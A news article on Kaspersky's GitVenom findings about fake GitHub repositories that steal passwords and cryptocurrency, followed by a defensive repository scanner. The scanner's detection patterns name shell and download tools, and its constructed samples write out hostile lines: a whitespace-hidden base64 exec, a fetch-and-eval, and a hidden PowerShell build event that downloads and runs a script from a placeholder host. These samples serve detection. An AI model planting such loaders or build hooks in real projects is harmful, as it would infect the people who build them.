Hackers Attack Cryptocurrency Wallets via GitHub
According to Kaspersky Lab researchers, hackers spread malicious code through fake apps on GitHub to steal passwords and cryptocurrency.
The GitVenom campaign has been active for over two years but only recently gained widespread attention. It continues to grow rapidly, with the attackers having created hundreds of fake repositories. The most common lures are an Instagram account enhancer, a Telegram bot for managing Bitcoin wallets, and a cheat tool for Riot Games' Valorant.
"With more and more open-source projects being published, both state-sponsored actors and cybercriminals started using freely available code as a lure to infect their targets," the statement reads.
GitHub is a popular platform for sharing open-source applications, allowing users to browse projects and share their own creations. Both crypto developers and everyday users use the platform, making it an appealing target for hackers eager to spread malware quickly. For example, one crypto user lost over $400,000 in tokens due to the GitVenom campaign.
How Does the Malware Work?
The attackers hide the malicious code inside otherwise plausible projects written in several languages, including Python, JavaScript, C, and C++, placing it where a quick look at the main source files will not reveal it, so a cursory review of the repository is unlikely to spot it. Each repository also ships a polished README that describes the project's features, often generated with AI to make the project look credible.
Running such a project typically shows nothing on screen; in the background it fetches and launches additional components. Once on the system, the malware collects saved passwords and cryptocurrency wallet data, packs them into an archive and exfiltrates them via Telegram. Remote access trojans such as AsyncRAT and Quasar give the operators keylogging and screenshot capture, and a clipboard hijacker replaces wallet addresses the victim copies with attacker-controlled ones, diverting funds during an otherwise legitimate transfer.
"While coded in different programming languages, the malicious payloads stored inside the fake projects had the same goal – download further malicious components from an attacker-controlled GitHub repository and execute them," the researchers clarified in their report.
Advice for Users
The attackers keep changing their development and coding tactics to stay ahead of detection, including evading antivirus software. The researchers recommend reviewing code manually before running it whenever possible, preferring well-established projects with a long track record, and running unfamiliar applications in a virtual machine. When judging trustworthiness, bear in mind that the attackers artificially inflate activity metrics such as commit counts, for example with automated trivial commits, so that a repository looks actively maintained.
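The advice to review code before running it is easier to follow with a script that flags the concealment tricks this campaign relies on: a payload buried in the project structure, and a second stage fetched from an attacker-controlled GitHub repository. The scanner below is an added example written for this article; it is not Kaspersky's tooling and not code from any repository the report describes. It goes beyond the text by assuming concrete hiding patterns (code placed after hundreds of whitespace characters so it sits off-screen, decode-and-execute one-liners, long encoded string literals, fetches from raw GitHub URLs, and shell commands in Visual Studio build events); the thresholds, rule names, the sample files and the example-org URLs are all constructed for the example.

```python
"""Heuristic scan of a cloned repository for hidden, download-and-execute payloads.

Added example for this article, not Kaspersky's tooling. The rules below are
assumptions about how such payloads are concealed; tune thresholds for your code.
"""
import re
import sys
from pathlib import Path

SOURCE_SUFFIXES = {".py", ".js", ".mjs", ".c", ".cpp", ".h", ".cs", ".vcxproj", ".csproj"}
PROJECT_SUFFIXES = (".vcxproj", ".csproj")
PAD_THRESHOLD = 200   # leading whitespace columns: far beyond any normal indent
BLOB_THRESHOLD = 200  # length of a single base64-looking string literal

RULE_PAD = "code placed after long whitespace padding (off-screen in an editor)"
RULE_DECODE_EXEC = "decode-and-execute on the same line"
RULE_RAW_URL = "fetches content from a raw GitHub URL"
RULE_BLOB = "long encoded literal in a file that also decodes data"
RULE_BUILD = "build event runs a shell or download command"

RE_DECODE = re.compile(r"b64decode|atob\s*\(|fromhex\s*\(|unhexlify|FromBase64String", re.I)
RE_EXEC = re.compile(r"\b(?:exec|eval|Function)\s*\(|subprocess\.|os\.system|"
                     r"child_process|Invoke-Expression|\bIEX\b", re.I)
RE_RAW_URL = re.compile(r"https?://(?:raw\.githubusercontent\.com|"
                        r"github\.com/[^\s'\"]+?/raw/)[^\s'\"]*", re.I)
RE_BLOB = re.compile(r"['\"]([A-Za-z0-9+/=]{%d,})['\"]" % BLOB_THRESHOLD)
RE_BUILD_OPEN = re.compile(r"<(?:Pre|Post)BuildEvent>|<Exec\s+Command=", re.I)
RE_BUILD_CLOSE = re.compile(r"</(?:Pre|Post)BuildEvent>|/>", re.I)
RE_SHELL = re.compile(r"powershell|cmd(?:\.exe)?\s*/c|\bcurl\b|\bwget\b|certutil|"
                      r"DownloadString|Invoke-WebRequest|\biwr\b|https?://", re.I)


def scan_text(path, text):
    """Return (path, line_no, rule) findings for the contents of one file."""
    findings = []
    is_project = path.lower().endswith(PROJECT_SUFFIXES)
    file_decodes = bool(RE_DECODE.search(text))  # makes a long blob suspicious
    in_build_event = False
    for no, line in enumerate(text.splitlines(), 1):
        body = line.lstrip(" \t")
        if body and len(line) - len(body) >= PAD_THRESHOLD:
            findings.append((path, no, RULE_PAD))
        if RE_DECODE.search(line) and RE_EXEC.search(line):
            findings.append((path, no, RULE_DECODE_EXEC))
        if RE_RAW_URL.search(line):
            findings.append((path, no, RULE_RAW_URL))
        if file_decodes and RE_BLOB.search(line):
            findings.append((path, no, RULE_BLOB))
        if is_project:  # Visual Studio project files run build events on build
            if RE_BUILD_OPEN.search(line):
                in_build_event = True
            if in_build_event and RE_SHELL.search(line):
                findings.append((path, no, RULE_BUILD))
            if RE_BUILD_CLOSE.search(line):
                in_build_event = False
    return findings


def scan_repo(root):
    """Walk a cloned repository and scan every source and project file."""
    findings = []
    for path in sorted(Path(root).rglob("*")):
        if ".git" in path.parts or not path.is_file():
            continue
        if path.suffix.lower() in SOURCE_SUFFIXES:
            text = path.read_text(encoding="utf-8", errors="replace")
            findings.extend(scan_text(str(path), text))
    return findings


# Constructed samples (not real GitVenom artifacts); example-org URLs are placeholders.
SAMPLES = {
    "tools/helper.py": "import requests\n" + " " * 1500
        + "exec(__import__('base64').b64decode('aW1wb3J0IG9z'))\n",
    "src/index.js": 'fetch("https://raw.githubusercontent.com/example-org/example-repo/main/x.txt")'
        '.then(r => r.text()).then(t => eval(atob(t)));\n',
    "build/app.vcxproj": "<PreBuildEvent>\n  <Command>powershell -w hidden -c \"iwr "
        "https://raw.githubusercontent.com/example-org/example-repo/main/p.ps1 | iex\"</Command>\n"
        "</PreBuildEvent>\n",
    "lib/clean.py": "import base64\n\ndef decode(s):\n    return base64.b64decode(s)\n",
}


def scan_samples():
    """Scan the constructed samples; returns {path: sorted rule names}."""
    return {p: sorted({r for _, _, r in scan_text(p, t)}) for p, t in SAMPLES.items()}


if __name__ == "__main__":
    if len(sys.argv) > 1:  # real use: python scan_repo.py path/to/clone
        hits = scan_repo(sys.argv[1])
        for path, no, rule in hits:
            print(f"{path}:{no}: {rule}")
        sys.exit(1 if hits else 0)
    for path, rules in scan_samples().items():
        print(path, rules or "clean")
```

Run it against a fresh clone (saved as, say, scan_repo.py: `python scan_repo.py path/to/clone`) before opening the project in an IDE or building it, since a Visual Studio build event fires on build, not on launch. A clean result proves nothing, because the patterns are assumptions and the attackers keep changing them, but any hit in a project from an unknown author is a strong reason to stop and inspect the flagged line in a virtual machine rather than on a workstation holding wallet data.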
Notably, while preparing the report, Kaspersky Lab researchers found not only newly created fraudulent projects but also repositories set up more than two years ago that are still active and in use. Based on download statistics, they estimate the number of victims to be in the thousands. The largest groups of victims are in Russia, Brazil, and Turkey, though the campaign is global.
The content on The Coinomist is for informational purposes only and should not be interpreted as financial advice. While we strive to provide accurate and up-to-date information, we do not guarantee the accuracy, completeness, or reliability of any content, nor do we accept liability for any errors or omissions in the information provided or for any financial losses incurred as a result of relying on this information. Actions based on this content are at your own risk. Always do your own research and consult a professional. See our Terms, Privacy Policy, and Disclaimers for more details.